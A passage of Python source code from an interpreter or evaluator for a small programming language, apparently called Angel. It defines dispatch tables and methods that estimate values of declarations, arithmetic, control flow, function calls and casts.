nodes.OptionalSomeValue: self.estimate_optional_some_value,\n nodes.OptionalTypeConstructor: self.estimate_optional_constructor,\n\n nodes.IntegerLiteral: self.estimate_integer_literal,\n nodes.DecimalLiteral: self.estimate_decimal_literal,\n nodes.StringLiteral: self.estimate_string_literal,\n nodes.CharLiteral: self.estimate_char_literal,\n nodes.BoolLiteral: self.estimate_bool_literal,\n nodes.VectorLiteral: self.estimate_vector_literal,\n nodes.DictLiteral: self.estimate_dict_literal,\n }\n\n add_dispatcher = {\n (enodes.DynamicValue, enodes.DynamicValue): self.estimate_add_dyn_values,\n (enodes.Int, enodes.Int): self.estimate_add_ints,\n (enodes.String, enodes.String): self.estimate_add_strings,\n (enodes.Vector, enodes.Vector): self.estimate_add_vectors,\n (enodes.Instance, enodes.Instance): partial(\n self.estimate_arithmetic_operation_instances, nodes.SpecialMethods.add\n ),\n (enodes.DynamicValue, enodes.String): self.estimate_add_dyn_value_and_string,\n }\n\n sub_dispatcher = {\n (enodes.Int, enodes.Int): self.estimate_sub_ints,\n (enodes.Instance, enodes.Instance): partial(\n self.estimate_arithmetic_operation_instances, nodes.SpecialMethods.sub\n ),\n }\n\n mul_dispatcher = {\n (enodes.Int, enodes.Int): self.estimate_mul_ints,\n (enodes.Instance, enodes.Instance): partial(\n self.estimate_arithmetic_operation_instances, nodes.SpecialMethods.mul\n ),\n }\n\n div_dispatcher = {\n (enodes.Int, enodes.Int): self.estimate_div_ints,\n (enodes.Instance, enodes.Instance): partial(\n self.estimate_arithmetic_operation_instances, nodes.SpecialMethods.div\n ),\n }\n\n eq_dispatcher: t.Dict[t.Tuple[type, type], t.Callable] = {\n (enodes.Int, enodes.Int): lambda x, y, xe, ye: enodes.Bool(xe.value == ye.value),\n (enodes.String, enodes.String): lambda x, y, xe, ye: enodes.Bool(xe.value == ye.value),\n (enodes.Char, enodes.Char): lambda x, y, xe, ye: enodes.Bool(xe.value == ye.value),\n (enodes.Bool, enodes.Bool): lambda x, y, xe, ye: enodes.Bool(xe.value == ye.value),\n (enodes.OptionalConstructor, enodes.OptionalConstructor): lambda x, y, xe, ye: enodes.Bool(xe.value == ye.value),\n (enodes.Instance, enodes.Instance): self.estimate_eq_instances,\n\n (enodes.OptionalSomeCall, enodes.OptionalConstructor): lambda x, y, xe, ye: enodes.Bool(False),\n }\n\n lt_dispatcher = {\n (enodes.Int, enodes.Int): lambda x, y, xe, ye: enodes.Bool(xe.value < ye.value),\n }\n\n gt_dispatcher = {\n (enodes.Int, enodes.Int): lambda x, y, xe, ye: enodes.Bool(xe.value > ye.value),\n }\n\n self.binary_operator_dispatcher = {\n nodes.Operator.add.value: lambda x, y, xe, ye: dispatch(\n add_dispatcher, (type(xe), type(ye)), x, y, xe, ye\n ),\n nodes.Operator.sub.value: lambda x, y, xe, ye: dispatch(\n sub_dispatcher, (type(xe), type(ye)), x, y, xe, ye\n ),\n nodes.Operator.mul.value: lambda x, y, xe, ye: dispatch(\n mul_dispatcher, (type(xe), type(ye)), x, y, xe, ye\n ),\n nodes.Operator.div.value: lambda x, y, xe, ye: dispatch(\n div_dispatcher, (type(xe), type(ye)), x, y, xe, ye\n ),\n\n nodes.Operator.eq_eq.value: lambda x, y, xe, ye: dispatch(\n eq_dispatcher, (type(xe), type(ye)), x, y, xe, ye\n ),\n nodes.Operator.lt.value: lambda x, y, xe, ye: dispatch(\n lt_dispatcher, (type(xe), type(ye)), x, y, xe, ye\n ),\n nodes.Operator.gt.value: lambda x, y, xe, ye: dispatch(\n gt_dispatcher, (type(xe), type(ye)), x, y, xe, ye\n ),\n\n nodes.Operator.and_.value: self.estimate_binary_expression_and,\n nodes.Operator.or_.value: self.estimate_binary_expression_or,\n }\n\n self.estimate_field_dispatcher = {\n enodes.String: lambda base, f: self.estimate_builtin_field(self.estimated_objs.string_fields, base, f),\n enodes.Vector: lambda base, f: self.estimate_builtin_field(self.estimated_objs.vector_fields, base, f),\n enodes.Dict: lambda base, f: self.estimate_builtin_field(self.estimated_objs.dict_fields, base, f),\n enodes.Instance: self.estimate_instance_field,\n enodes.Algebraic: self.estimate_algebraic_field,\n enodes.AlgebraicConstructorInstance: self.estimate_algebraic_constructor_instance_field,\n enodes.Ref: self.estimate_ref_field,\n enodes.DynamicValue: self.estimate_dyn_field,\n }\n\n self.assignment_dispatcher = {\n nodes.Name: self.estimate_name_assignment,\n nodes.Field: self.estimate_field_assignment,\n nodes.Subscript: self.estimate_subscript_assignment,\n }\n\n self.node_dispatcher = {\n nodes.Decl: self.estimate_decl,\n nodes.FunctionDeclaration: self.estimate_function_declaration,\n nodes.FieldDeclaration: self.estimate_field_declaration,\n nodes.InitDeclaration: self.estimate_init_declaration,\n nodes.MethodDeclaration: self.estimate_method_declaration,\n nodes.StructDeclaration: self.estimate_struct_declaration,\n nodes.ExtensionDeclaration: self.estimate_extension_declaration,\n nodes.AlgebraicDeclaration: self.estimate_algebraic_declaration,\n nodes.InterfaceDeclaration: self.estimate_interface_declaration,\n nodes.FunctionCall: self.estimate_expression,\n nodes.InitCall: self.estimate_init_call,\n nodes.MethodCall: self.estimate_expression,\n\n nodes.Return: self.estimate_return,\n nodes.Break: self.estimate_break,\n nodes.Assignment: lambda statement: dispatch(\n self.assignment_dispatcher, type(statement.left), statement.left, statement.right\n ),\n nodes.While: self.estimate_while_statement,\n nodes.For: self.estimate_for_statement,\n nodes.If: self.estimate_if_statement,\n }\n\n def estimate_node(self, node: nodes.Node) -> t.Optional[enodes.Expression]:\n return dispatch(self.node_dispatcher, type(node), node)\n\n def estimate_ast(self, ast: Iterable[nodes.Node]) -> t.Optional[enodes.Expression]:\n result = None\n for node in ast:\n result = self.estimate_node(node)\n if result is not None and not isinstance(result, enodes.Void):\n return result\n return result\n\n def estimate_decl(self, node: nodes.Decl) -> None:\n assert node.type is not None\n estimated = None\n if node.value is not None:\n estimated = self.estimate_expression(node.value)\n self.env.add_declaration(node, estimated_value=estimated)\n\n def estimate_function_declaration(self, declaration: nodes.FunctionDeclaration) -> None:\n self.env.add_function(\n declaration.line, declaration.name, declaration.parameters, declaration.arguments, declaration.return_type,\n declaration.where_clause\n )\n self.env.update_function_body(declaration.name, declaration.body)\n\n def estimate_method_declaration(self, declaration: nodes.MethodDeclaration) -> None:\n self.env.add_method(declaration.line, declaration.name, declaration.arguments, declaration.return_type)\n self.env.update_method_body(declaration.name, declaration.body)\n\n def estimate_init_declaration(self, declaration: nodes.InitDeclaration) -> None:\n self.env.add_init_declaration(declaration.line, declaration.arguments)\n self.env.update_init_declaration_body(declaration.arguments, declaration.body)\n\n def estimate_init_call(self, call: nodes.InitCall) -> None:\n pass\n\n def estimate_struct_declaration(self, declaration: nodes.StructDeclaration) -> None:\n # list(...) for mypy\n self.env.add_struct(declaration.line, declaration.name, declaration.parameters, declaration.interfaces)\n self.env.inc_nesting(declaration.name)\n self.estimate_ast(list(declaration.fields.all))\n self.estimate_ast(list(declaration.init_declarations))\n self.estimate_ast(list(declaration.methods.all))\n self.env.dec_nesting(declaration.name)\n\n def estimate_extension_declaration(self, declaration: nodes.ExtensionDeclaration) -> None:\n # list(...) for mypy\n self.env.inc_nesting(declaration.name)\n self.estimate_ast(list(declaration.methods.all))\n self.env.dec_nesting(declaration.name)\n\n def estimate_algebraic_declaration(self, declaration: nodes.AlgebraicDeclaration) -> None:\n self.env.add_algebraic(declaration.line, declaration.name, declaration.parameters)\n self.env.inc_nesting(declaration.name)\n self.estimate_ast(list(declaration.constructors))\n self.estimate_ast(list(declaration.methods.all))\n self.env.dec_nesting(declaration.name)\n\n def estimate_interface_declaration(self, declaration: nodes.InterfaceDeclaration) -> None:\n self.env.add_interface(\n declaration.line, declaration.name, declaration.parameters, declaration.implemented_interfaces\n )\n self.env.inc_nesting(declaration.name)\n self.estimate_ast(list(declaration.fields))\n self.estimate_ast(list(declaration.methods))\n self.env.dec_nesting(declaration.name)\n\n def estimate_field_declaration(self, declaration: nodes.FieldDeclaration) -> None:\n self.env.add_field(declaration.line, declaration.name, declaration.type)\n\n def estimate_name_assignment(self, name: nodes.Name, value: nodes.Expression) -> None:\n if name.module:\n assert 0, \"Module system is not supported\"\n right = self.estimate_expression(value)\n entry = self.env[name.member]\n # Estimation is performed after name checking.\n assert entry is not None\n if isinstance(entry, entries.DeclEntry) and entry.is_constant:\n assert not entry.has_value\n entry.estimated_value = right\n entry.has_value = True\n elif isinstance(entry, entries.DeclEntry) and entry.is_variable:\n entry.estimated_value = right\n else:\n assert 0, f\"REPL cannot reassign {type(entry)}\"\n\n def estimate_field_assignment(self, field: nodes.Field, value: nodes.Expression) -> None:\n estimated_value = self.estimate_expression(value)\n # @Cleanup: Move to dispatcher\n if isinstance(field.base, nodes.Name):\n assert not field.base.module\n base_entry = self.env[field.base.member]\n assert isinstance(base_entry, entries.DeclEntry) and base_entry.is_variable\n if isinstance(base_entry.estimated_value, enodes.Instance):\n base_entry.estimated_value.fields[field.field.member] = estimated_value\n elif isinstance(base_entry.estimated_value, enodes.Ref):\n base_entry.estimated_value.initial_expression = value\n base_entry.estimated_value.value = estimated_value\n else:\n assert 0, f\"Cannot estimate field assignment {field.to_code()} = {value.to_code()}\"\n elif isinstance(field.base, nodes.SpecialName):\n base_entry = self.env[field.base.value]\n assert isinstance(base_entry, entries.DeclEntry) and base_entry.is_variable\n assert isinstance(base_entry.estimated_value, enodes.Instance)\n base_entry.estimated_value.fields[field.field.member] = estimated_value\n else:\n assert 0, f\"Cannot estimate field assignment with base '{field.base}'\"\n\n def estimate_subscript_assignment(self, subscript: nodes.Subscript, value: nodes.Expression) -> None:\n estimated_value = self.estimate_expression(value)\n estimated_index = self.estimate_expression(subscript.index)\n assert isinstance(estimated_index, enodes.Int)\n assert isinstance(estimated_value, enodes.Char)\n # @Cleanup: Move to dispatcher\n if isinstance(subscript.base, nodes.Name):\n assert not subscript.base.module\n base_entry = self.env[subscript.base.member]\n # @Cleanup: separate this functionality to a function and use it in estimation of subscript\n assert isinstance(base_entry, entries.DeclEntry) and base_entry.is_variable\n assert isinstance(base_entry.estimated_value, enodes.String)\n new_value = list(base_entry.estimated_value.value)\n new_value[estimated_index.value] = estimated_value.value\n base_entry.estimated_value.value = \"\".join(new_value)\n else:\n assert 0, f\"Cannot estimate subscript with base '{subscript.base}'\"\n\n def estimate_while_statement(self, statement: nodes.While) -> t.Optional[enodes.Expression]:\n condition, body, assignment = self.desugar_if_let(statement.condition, statement.body)\n estimated_condition = self.estimate_expression(condition)\n if assignment is not None:\n body.append(assignment)\n assert isinstance(estimated_condition, enodes.Bool)\n while estimated_condition.value:\n result = self.estimate_ast(body)\n if isinstance(result, enodes.Break):\n break\n elif result is not None:\n return result\n estimated_condition = self.estimate_expression(condition)\n assert isinstance(estimated_condition, enodes.Bool)\n return None\n\n def estimate_for_statement(self, statement: nodes.For) -> t.Optional[enodes.Expression]:\n container = self.estimate_expression(statement.container)\n if isinstance(container, enodes.Vector):\n elements: t.Iterable = container.elements\n element_type = container.element_type\n elif isinstance(container, enodes.String):\n elements = (enodes.Char(char) for char in container.value)\n element_type = nodes.BuiltinType.char\n else:\n raise NotImplementedError\n self.env.inc_nesting()\n for element in elements:\n self.env.add_declaration(\n nodes.Decl(statement.line, DeclType.constant, statement.element, element_type),\n estimated_value=element\n )\n result = self.estimate_ast(statement.body)\n if isinstance(result, enodes.Break):\n break\n elif result is not None and not isinstance(result, enodes.Void):\n self.env.dec_nesting()\n return result\n self.env.dec_nesting()\n return None\n\n def desugar_if_let(\n self, condition: nodes.Expression, body: nodes.AST\n ) -> t.Tuple[nodes.Expression, nodes.AST, t.Optional[nodes.Assignment]]:\n assignment = None\n if isinstance(condition, nodes.Decl) and condition.is_constant:\n assert condition.value is not None\n tmp_right = self.create_repl_tmp(condition.value)\n to_prepend: t.List[nodes.Node] = [\n nodes.Decl(\n condition.line, DeclType.variable, condition.name, condition.type,\n nodes.OptionalSomeValue(tmp_right)\n )\n ]\n body = to_prepend + body\n assignment = nodes.Assignment(\n condition.line, tmp_right, nodes.Operator.eq, condition.value\n )\n condition = nodes.BinaryExpression(tmp_right, nodes.Operator.neq, nodes.OptionalTypeConstructor.none)\n return condition, body, assignment\n\n def estimate_if_statement(self, statement: nodes.If) -> t.Optional[enodes.Expression]:\n condition, body, _ = self.desugar_if_let(statement.condition, statement.body)\n evaluated_condition = self.estimate_expression(condition)\n assert isinstance(evaluated_condition, enodes.Bool)\n if evaluated_condition.value:\n return self.estimate_ast(body)\n for elif_condition, elif_body in statement.elifs:\n elif_condition, elif_body, _ = self.desugar_if_let(elif_condition, elif_body)\n cond = self.estimate_expression(elif_condition)\n assert isinstance(cond, enodes.Bool)\n if cond.value:\n return self.estimate_ast(elif_body)\n return self.estimate_ast(statement.else_)\n\n def create_repl_tmp(self, value: nodes.Expression) -> nodes.Name:\n name = nodes.Name(\"__repl_tmp\" + str(self.repl_tmp_count))\n self.repl_tmp_count += 1\n self.env.add_declaration(\n nodes.Decl(SPEC_LINE, DeclType.variable, name, self.infer_type(value), value),\n estimated_value=self.estimate_expression(value)\n )\n return name\n\n def estimate_return(self, statement: nodes.Return) -> enodes.Expression:\n return self.estimate_expression(statement.value)\n\n def estimate_break(self, _: nodes.Break) -> enodes.Break:\n return enodes.Break()\n\n def estimate_eq_instances(\n self, x: nodes.Expression, y: nodes.Expression, xe: enodes.Instance, ye: enodes.Instance\n ) -> enodes.Expression:\n result = self.estimate_method_call(\n nodes.MethodCall(\n SPEC_LINE, x, method=nodes.Name(nodes.SpecialMethods.eq.value), arguments=[y], instance_type=xe.type\n )\n )\n assert result\n return result\n\n def estimate_add_dyn_values(\n self, x: nodes.Expression, y: nodes.Expression, xe: enodes.DynamicValue, ye: enodes.DynamicValue\n ) -> enodes.Expression:\n return xe\n\n def estimate_add_ints(\n self, x: nodes.Expression, y: nodes.Expression, xe: enodes.Int, ye: enodes.Int\n ) -> enodes.Int:\n value = xe.value + ye.value\n new_type = self.infer_type(nodes.IntegerLiteral(str(value)))\n assert isinstance(new_type, nodes.BuiltinType)\n return enodes.Int(value, new_type)\n\n def estimate_add_strings(\n self, x: nodes.Expression, y: nodes.Expression, xe: enodes.String, ye: enodes.String\n ) -> enodes.String:\n return enodes.String(xe.value + ye.value)\n\n def estimate_add_dyn_value_and_string(\n self, x: nodes.Expression, y: nodes.Expression, xe: enodes.DynamicValue, ye: enodes.String\n ) -> enodes.Expression:\n assert isinstance(xe.type, nodes.BuiltinType) and xe.type == nodes.BuiltinType.string\n return enodes.DynamicValue(nodes.BuiltinType.string)\n\n def estimate_add_vectors(\n self, x: nodes.Expression, y: nodes.Expression, xe: enodes.Vector, ye: enodes.Vector\n ) -> enodes.Vector:\n element_type = xe.element_type\n if not xe.elements:\n element_type = ye.element_type\n return enodes.Vector(xe.elements + ye.elements, element_type)\n\n def estimate_arithmetic_operation_instances(\n self, method_name: nodes.SpecialMethods, x: nodes.Expression, y: nodes.Expression,\n xe: enodes.Instance, ye: enodes.Instance\n ) -> enodes.Instance:\n assert xe.type == ye.type\n entry = self.env.get(xe.type)\n assert isinstance(entry, entries.StructEntry)\n method_entry = entry.methods[submangle(nodes.Name(method_name.value), self.context).member]\n result = self.perform_function_call(\n method_entry.to_estimated_function(), [y], nodes.Argument(SELF_NAME, xe.type, x)\n )\n assert isinstance(result, enodes.Instance)\n return result\n\n def estimate_sub_ints(\n self, x: nodes.Expression, y: nodes.Expression, xe: enodes.Int, ye: enodes.Int\n ) -> enodes.Int:\n value = xe.value - ye.value\n new_type = self.infer_type(nodes.IntegerLiteral(str(value)))\n assert isinstance(new_type, nodes.BuiltinType)\n return enodes.Int(value, new_type)\n\n def estimate_mul_ints(\n self, x: nodes.Expression, y: nodes.Expression, xe: enodes.Int, ye: enodes.Int\n ) -> enodes.Int:\n value = xe.value * ye.value\n new_type = self.infer_type(nodes.IntegerLiteral(str(value)))\n assert isinstance(new_type, nodes.BuiltinType)\n return enodes.Int(value, new_type)\n\n def estimate_div_ints(\n self, x: nodes.Expression, y: nodes.Expression, xe: enodes.Int, ye: enodes.Int\n ) -> enodes.Int:\n if ye.value == 0:\n raise errors.AngelDivByZero\n value = int(Decimal(xe.value) / Decimal(ye.value))\n new_type = self.infer_type(nodes.IntegerLiteral(str(value)))\n assert isinstance(new_type, nodes.BuiltinType)\n # TODO: move to enodes.Float(value, new_type)\n return enodes.Int(int(value), new_type)\n\n def estimate_expression(self, expression: nodes.Expression) -> enodes.Expression:\n return dispatch(self.expression_dispatcher, type(expression), expression)\n\n def estimate_name(self, name: nodes.Name) -> enodes.Expression:\n if name.module:\n assert 0, \"Module system is not supported\"\n entry = self.env[name.member]\n # Estimation is performed after name checking.\n assert entry is not None, name.member\n if isinstance(entry, entries.DeclEntry):\n return entry.estimated_value\n elif isinstance(entry, entries.FunctionEntry):\n return entry.to_estimated_function()\n elif isinstance(entry, entries.StructEntry):\n return enodes.Struct(entry.name)\n elif isinstance(entry, entries.AlgebraicEntry):\n return enodes.Algebraic(entry.name, entry)\n else:\n # @Completeness: must have branches for all entry types\n assert 0, f\"{self.estimate_name} cannot dispatch entry type {type(entry)}\"\n\n def estimate_builtin_field(\n self, fields: EstimatedFields, base: enodes.Expression, field: nodes.Name\n ) -> enodes.Expression:\n estimated = fields[field.unmangled or field.member]\n if callable(estimated):\n return estimated(base)\n return estimated\n\n def estimate_algebraic_field(self, base: enodes.Algebraic, field: nodes.Name) -> enodes.Expression:\n return enodes.AlgebraicConstructor(base.name, field, entry=base.entry.constructors[field.member])\n\n def estimate_algebraic_constructor_instance_field(\n self, base: enodes.AlgebraicConstructorInstance, field: nodes.Name\n ) -> enodes.Expression:\n found = base.fields.get(field.member)\n if found is not None:\n return found\n constructor_entry = self.env.get_algebraic(\n nodes.AlgebraicType(base.type.name, parameters=[], constructor=base.type.constructor)\n )\n assert isinstance(constructor_entry, entries.StructEntry)\n method_entry = constructor_entry.methods.get(field.member)\n if method_entry is None:\n algebraic_entry = self.env.get(base.type.name)\n assert isinstance(algebraic_entry, entries.AlgebraicEntry)\n method_entry = algebraic_entry.methods[field.member]\n return method_entry.to_estimated_function()\n\n def estimate_instance_field(self, base: enodes.Instance, field: nodes.Name) -> enodes.Expression:\n found = base.fields.get(field.member)\n if found is not None:\n return found\n struct_entry = self.env[base.type.member]\n assert isinstance(struct_entry, entries.StructEntry)\n field_name = submangle(field, self.context).member\n method_entry = struct_entry.methods.get(field_name, struct_entry.methods.get(field.member))\n assert method_entry\n return method_entry.to_estimated_function()\n\n def estimate_ref_field(self, ref: enodes.Ref, field: nodes.Name) -> enodes.Expression:\n assert (field.unmangled or field.member) == 'value'\n return ref.value\n\n def estimate_dyn_field(self, dyn_value: enodes.DynamicValue, field: nodes.Name) -> enodes.Expression:\n assert isinstance(dyn_value.type, nodes.Name)\n entry = self.env.get(dyn_value.type)\n assert isinstance(entry, entries.StructEntry)\n field_entry = entry.fields[field.member]\n assert isinstance(field_entry, entries.DeclEntry)\n return enodes.DynamicValue(field_entry.type)\n\n def estimate_field(self, field: nodes.Field) -> enodes.Expression:\n base = self.estimate_expression(field.base)\n return dispatch(self.estimate_field_dispatcher, type(base), base, field.field)\n\n def estimate_subscript(self, subscript: nodes.Subscript) -> enodes.Expression:\n base = self.estimate_expression(subscript.base)\n # @Cleanup: Move to dispatcher\n if isinstance(base, enodes.String):\n index = self.estimate_expression(subscript.index)\n assert isinstance(index, enodes.Int)\n return enodes.Char(base.value[index.value])\n elif isinstance(base, enodes.Vector):\n index = self.estimate_expression(subscript.index)\n assert isinstance(index, enodes.Int)\n return base.elements[index.value]\n elif isinstance(base, enodes.Dict):\n index = self.estimate_expression(subscript.index)\n return base.values[base.keys.index(index)]\n else:\n assert 0, f\"Cannot estimate subscript from '{base}'\"\n\n def estimate_special_name(self, special_name: nodes.SpecialName) -> enodes.Expression:\n return self.estimate_name(nodes.Name(special_name.value))\n\n def estimate_function_call(self, call: nodes.FunctionCall) -> t.Optional[enodes.Expression]:\n \"\"\"Estimate function or struct call.\n 1. Get the function/struct estimated object\n 2. Create an environment based on the environment that was available before function/struct declaration\n 3. Override names with arguments\n 4. Run the body\n 5. Return the result if the function returns one\n \"\"\"\n function = self.estimate_expression(call.function_path)\n if isinstance(function, enodes.Struct):\n if function.name.module:\n assert 0, \"Module system is not supported\"\n struct_entry = self.env[function.name.member]\n assert isinstance(struct_entry, entries.StructEntry)\n return self.match_init_declaration(function, list(struct_entry.init_declarations.values()), call.arguments)\n assert isinstance(function, enodes.Function)\n arguments = call.arguments\n if function.name == nodes.BuiltinFunc.print.value:\n arg_type = self.infer_type(arguments[0])\n arguments = [\n nodes.Cast(\n call.arguments[0], nodes.BuiltinType.string, is_builtin=isinstance(arg_type, nodes.BuiltinType)\n )\n ]\n return self.perform_function_call(function, arguments)\n\n def match_algebraic_constructor_init(\n self, algebraic_constructor: enodes.AlgebraicConstructor, init_declarations: t.List[entries.InitEntry],\n arguments: t.List[nodes.Expression]\n ) -> enodes.AlgebraicConstructorInstance:\n result = self.match_init_declaration(enodes.Struct(algebraic_constructor.constructor), init_declarations, arguments, algebraic=algebraic_constructor.name)\n return enodes.AlgebraicConstructorInstance(algebraic_constructor, result.fields)\n\n def match_init_declaration(\n self, struct: enodes.Struct, init_declarations: t.List[entries.InitEntry], arguments: t.List[nodes.Expression],\n algebraic: t.Optional[nodes.Name] = None\n ) -> enodes.Instance:\n estimated_arguments = [self.estimate_expression(argument) for argument in arguments]\n matched = True\n expected_major = []\n if algebraic:\n struct_entry: entries.Entry = self.env.get_algebraic(\n nodes.AlgebraicType(algebraic, [], constructor=struct.name)\n )\n else:\n struct_entry = self.env.get(struct.name)\n assert isinstance(struct_entry, entries.StructEntry)\n\n for init_entry in init_declarations:\n struct_mapping: t.Dict[str, nodes.Type] = {}\n for param in struct_entry.parameters:\n struct_mapping[param.member] = self.type_checker.create_template_type()\n\n for arg, value in zip_longest(init_entry.arguments, arguments):\n if value is None:\n value = arg.value\n if arg is None or value is None:\n matched = False\n break\n arg_type = apply_mapping(arg.type, struct_mapping)\n try:\n self.infer_type(value, arg_type)\n except errors.AngelTypeError:\n matched = False\n break\n else:\n arg_type = self.type_checker.replace_template_types(arg_type)\n if not matched:\n matched = True\n expected_major.append([arg.type for arg in init_entry.arguments])\n continue\n self.env.inc_nesting()\n self.env.add_declaration(\n nodes.Decl(0, DeclType.variable, SELF_NAME, struct.name),\n estimated_value=enodes.Instance(struct.name)\n )\n for arg, value, estimated in zip_longest(init_entry.arguments, arguments, estimated_arguments):\n if value is None:\n value = arg.value\n estimated = self.estimate_expression(value)\n assert estimated is not None and value is not None\n self.env.add_declaration(\n nodes.Decl(0, DeclType.constant, arg.name, arg_type, value), estimated_value=estimated\n )\n if len(init_entry.body) == 1 and isinstance(init_entry.body[0], nodes.InitCall):\n return self.match_init_declaration(\n struct, init_declarations, init_entry.body[0].arguments, algebraic\n )\n self.estimate_ast(init_entry.body)\n self_entry = self.env[nodes.SpecialName.self.value]\n assert isinstance(self_entry, entries.DeclEntry) and self_entry.is_variable\n self_value = self_entry.estimated_value\n assert isinstance(self_value, enodes.Instance)\n self.env.dec_nesting()\n return self_value\n expected = \" or \".join(\n (\"(\" + \", \".join(type_.to_code() for type_ in type_list) + \")\" for type_list in expected_major)\n )\n raise errors.AngelWrongArguments(expected, self.code, arguments)\n\n def perform_function_call(\n self, function: enodes.Function, arguments: t.List[nodes.Expression],\n self_argument: t.Optional[nodes.Argument] = None\n ) -> t.Optional[enodes.Expression]:\n \"\"\"\n 1. Estimate the arguments and the self_argument\n 2. Create an environment based on function.saved_environment\n 3. Populate that environment with the arguments and the self argument\n 4. Call function's body\n \"\"\"\n estimated_arguments = [self.estimate_expression(argument) for argument in arguments]\n if not isinstance(function.specification, list):\n if self_argument:\n assert self_argument.value\n estimated_arguments = [self.estimate_expression(self_argument.value)] + estimated_arguments\n return function.specification(*estimated_arguments)\n\n if self_argument:\n assert self_argument.value\n estimated_self: t.Optional[enodes.Expression] = self.estimate_expression(self_argument.value)\n else:\n estimated_self = None\n\n environment_backup = copy(self.env)\n self.env = environment.Environment(function.saved_environment)\n if self_argument:\n self.env.add_declaration(\n nodes.Decl(SPEC_LINE, DeclType.variable, SELF_NAME, self_argument.type, self_argument.value),\n estimated_value=estimated_self\n )\n\n for argument, expression, estimated in zip_longest(function.arguments, arguments, estimated_arguments):\n self.env.add_declaration(\n nodes.Decl(SPEC_LINE, DeclType.constant, argument.name, argument.type, expression),\n estimated_value=estimated\n )\n\n result = self.estimate_ast(function.specification)\n self.env = environment_backup\n return result\n\n def estimate_method_call(self, call: nodes.MethodCall) -> t.Optional[enodes.Expression]:\n method = self.estimate_expression(nodes.Field(call.line, call.instance_path, call.method))\n if isinstance(method, enodes.Function):\n assert call.instance_type\n return self.perform_function_call(\n method, call.arguments, nodes.Argument(SELF_NAME, call.instance_type, call.instance_path)\n )\n elif isinstance(method, enodes.AlgebraicConstructor):\n algebraic_entry = self.env.get(method.name)\n assert isinstance(algebraic_entry, entries.AlgebraicEntry)\n constructor_entry = algebraic_entry.constructors[method.constructor.member]\n return self.match_algebraic_constructor_init(\n method, list(constructor_entry.init_declarations.values()), call.arguments\n )\n else:\n assert 0, f\"Cannot estimate method call with estimated method {method}\"\n\n def estimate_binary_expression_and(\n self, x: nodes.Expression, y: nodes.Expression, xe: enodes.Expression, ye: enodes.Expression\n ) -> enodes.Bool:\n assert isinstance(xe, enodes.Bool) and isinstance(ye, enodes.Bool)\n return enodes.Bool(xe.value and ye.value)\n\n def estimate_binary_expression_or(\n self, x: nodes.Expression, y: nodes.Expression, xe: enodes.Expression, ye: enodes.Expression\n ) -> enodes.Bool:\n assert isinstance(xe, enodes.Bool) and isinstance(ye, enodes.Bool)\n return enodes.Bool(xe.value or ye.value)\n\n def estimate_binary_expression(self, expression: nodes.BinaryExpression) -> enodes.Expression:\n if expression.operator.value == nodes.Operator.is_.value:\n if isinstance(expression.left, nodes.BuiltinType):\n if not isinstance(expression.right, nodes.BuiltinType):\n return enodes.Bool(False)\n if expression.right.value in expression.left.get_builtin_supertypes():\n return enodes.Bool(True)\n return enodes.Bool(False)\n if expression.right == nodes.BuiltinType.object_:\n return enodes.Bool(True)\n assert isinstance(expression.left, nodes.Name)\n assert isinstance(expression.right, (nodes.Name, nodes.BuiltinType, nodes.GenericType))\n entry = self.env.get(expression.left)\n assert isinstance(entry, (entries.StructEntry, entries.ParameterEntry))\n if entry.implements_interface(expression.right):\n return enodes.Bool(True)\n return enodes.Bool(False)\n left = self.estimate_expression(expression.left)\n right = self.estimate_expression(expression.right)\n if expression.operator.value == nodes.Operator.neq.value:\n result = dispatch(\n self.binary_operator_dispatcher, nodes.Operator.eq_eq.value, expression.left,\n expression.right, left, right\n )\n assert isinstance(result, enodes.Bool)\n return enodes.Bool(not result.value)\n elif expression.operator.value == nodes.Operator.lt_eq.value:\n result = dispatch(\n self.binary_operator_dispatcher, nodes.Operator.gt.value, expression.left, expression.right,\n left, right\n )\n assert isinstance(result, enodes.Bool)\n return enodes.Bool(not result.value)\n elif expression.operator.value == nodes.Operator.gt_eq.value:\n result = dispatch(\n self.binary_operator_dispatcher, nodes.Operator.lt.value, expression.left, expression.right,\n left, right\n )\n assert isinstance(result, enodes.Bool)\n return enodes.Bool(not result.value)\n return dispatch(\n self.binary_operator_dispatcher, expression.operator.value, expression.left, expression.right, left, right\n )\n\n def estimate_ref(self, ref: nodes.Ref) -> enodes.Expression:\n current_value = self.estimate_expression(ref.value)\n return enodes.Ref(current_value, initial_expression=ref.value)\n\n def estimate_cast(self, cast: nodes.Cast) -> enodes.Expression:\n value = self.estimate_expression(cast.value)\n if isinstance(cast.to_type, nodes.Name) and isinstance(value, enodes.Instance):\n assert isinstance(value.type, nodes.Name) and cast.to_type == value.type\n return value\n assert isinstance(cast.to_type, nodes.BuiltinType)\n if cast.to_type.value == nodes.BuiltinType.string.value:\n if isinstance(value, enodes.Instance):\n entry = self.env.get(value.type)\n assert isinstance(entry, entries.StructEntry)\n method_entry = entry.methods[\n submangle(nodes.Name(nodes.SpecialMethods.as_.value), self.context).member\n ]\n result = self.perform_function_call(\n method_entry.to_estimated_function(), arguments=[],\n self_argument=nodes.Argument(SELF_NAME, value.type, cast.value)\n )\n assert result\n return result\n elif isinstance(value, enodes.String):\n return value\n elif isinstance(value, enodes.Char):\n return enodes.String(value.value)\n elif isinstance(value, (enodes.Bool, enodes.Dict, enodes.Vector)):\n return enodes.String(value.to_code())\n elif isinstance(value, enodes.DynamicValue):\n assert isinstance(value.type, nodes.BuiltinType) and value.type.is_finite_int_type\n return enodes.DynamicValue(nodes.BuiltinType.string)\n assert isinstance(value, (enodes.Int, enodes.Float)), type(value)\n return enodes.String(str(value.value))\n assert isinstance(value, (enodes.Int, enodes.Float)), type(value)\n return enodes.Int(int(value.value), cast.to_type)\n\n def estimate_optional_some_call(self, call: nodes.OptionalSomeCall) -> enodes.Expression:\n return enodes.OptionalSomeCall(self.estimate_expression(call.value))\n\n def estimate_optional_some_value(self, value: nodes.OptionalSomeValue) -> enodes.Expression:\n some_call = self.estimate_expression(value.value)\n assert isinstance(some_call, enodes.OptionalSomeCall)\n return some_call.inner_value\n\n def estimate_optional_constructor(self, constructor: nodes.OptionalTypeConstructor) -> enodes.Expression:\n return enodes.OptionalConstructor(constructor.value)\n\n def estimate_integer_literal(self, literal: nodes.IntegerLiteral) -> enodes.Expression:\n int_type = self.infer_type(literal)\n assert isinstance(int_type, nodes.BuiltinType)\n return enodes.Int(int(literal.value), int_type)\n\n def estimate_decimal_literal(self, literal: nodes.DecimalLiteral) -> enodes.Expression:\n float_type = self.infer_type(literal)\n assert isinstance(float_type, nodes.BuiltinType)\n return 